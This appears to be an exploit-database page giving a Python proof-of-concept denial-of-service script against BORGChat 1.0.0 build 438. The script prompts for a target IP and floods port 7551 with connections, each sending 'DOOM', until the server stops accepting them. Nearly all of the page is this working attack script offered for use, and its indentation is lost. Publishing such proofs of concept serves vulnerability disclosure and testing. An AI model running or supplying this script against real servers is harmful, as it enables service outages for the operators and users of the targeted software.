BORGChat 1.0.0 Build 438 Denial Of Service

BORGChat version 1.0.0 build 438 denial of service proof of concept exploit.


MD5 | bb4303232ac8abac5a8706da2f19958f

# Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://borgchat.10n.ro
# Software Link: http://borgchat.10n.ro/download.php
# Version: 1.0.0 build 438
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)

#!/usr/bin/python
import socket
print "# # # # # # # #"
print "BORGChat 1.0.0"
print "# # # # # # # #"
print "\r\n"
Ip = raw_input("[Ip]: ")
Port = 7551 # Default port

arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((Ip,Port)))
arr[c].send("DOOM")
print "Sie!"
c+=1
except socket.error:
print "++ Done! ++"
raw_input()
break


Related Posts